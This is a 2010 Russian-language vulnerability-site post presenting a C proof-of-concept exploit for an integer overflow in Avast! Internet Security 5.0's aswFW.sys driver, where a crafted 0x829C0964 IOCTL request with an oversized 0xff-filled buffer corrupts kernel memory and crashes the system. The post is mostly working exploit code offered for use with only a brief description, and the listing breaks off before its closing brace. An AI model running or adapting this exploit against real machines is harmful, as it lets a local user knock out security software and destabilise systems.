SgW32 Четверг, 25.04.2024, 13:22
Главная | Регистрация | Вход Приветствую Вас Гость | RSS
Меню сайта

Разделы новостей
Уязвимости [106]
Релизы [7]
Туториалы [0]
Новости сайта [2]
Инетересности [2]
Другое [1]

Наш опрос
Каких программ на сайте не хватает?
Результаты | Архив опросов
Всего ответов: 72
Главная » 2010 » Август » 11 » Эксплоит для Avast! Internet Security 5.0
Эксплоит для Avast! Internet Security 5.0
16:51
Цель: Avast! Internet Security 5.0
Воздействие: Отказ в обслуживании

Целочисленное переполнение обнаружено в драйвере устройства aswFW.sys. Локальный пользователь может с помощью специально сформированного 0x829C0964 IOCTL запроса вызвать повреждение памяти и аварийно завершить работу приложения.

#include "stdafx.h"  

#include "windows.h"  

#include "winioctl.h"  

#include "stdio.h"  

  

int main(void)  

{  

  HANDLE hFile = NULL;  

  ULONG ioctl_code = 0;  

  CHAR outBuf[32];  

  CHAR rpt_inBuf[102400];  

  DWORD dwRet = 0, ret = 0;  

  

  hFile = CreateFile("\\\\.\\aswFW", FILE_SHARE_READ | FILE_SHARE_WRITE,  

                     0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,  

                     NULL);  

  if(hFile == INVALID_HANDLE_VALUE){  

        fprintf(stderr, "failed to open 'aswFW.sys' kernel driver!\n");  

    return(-1);  

  }  

  

  rpt_inBuf[0] = '\xff'; // first 4 byte wiil uses calculate  

  rpt_inBuf[1] = '\xff'; // allication size of ExAllocatePoolWithTag.  

  rpt_inBuf[2] = '\xff'; // and it is [Irp+0Ch] as User Controlled Buffer.  

  rpt_inBuf[3] = '\xff';  

  memset((rpt_inBuf+4), 0xff, 102394);  

  

  // IOCTL Code = 0x829C0964 ( IOCTL_ASWFW_COMM_PIDINFO_RESULTS )  

  // ( another IOCTL Code also vulnerable )  

  ret = DeviceIoControl(hFile, 0x829C0964,  

        (PVOID)rpt_inBuf, 102398, outBuf, 32, &dwRet, NULL);  

  

  return 0;  



Категория: Уязвимости | Просмотров: 686 | Добавил: Sgw32 | Рейтинг: 0.0/0 |
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Форма входа

Календарь новостей
«  Август 2010  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
3031

Поиск

Друзья сайта
  • Скачать Java игры!
  • Нажмите на рекламу, поддержите сайт!!!

    • Integral Calculator
    Enter a function to integrate:

    Variable:

    Limit Calculator
    Enter a function to compute its limit:
    Limit variable: Compute at: Limit type

Статистика
Copyright Sgw32 Corporation © 2024 Используются технологии uCoz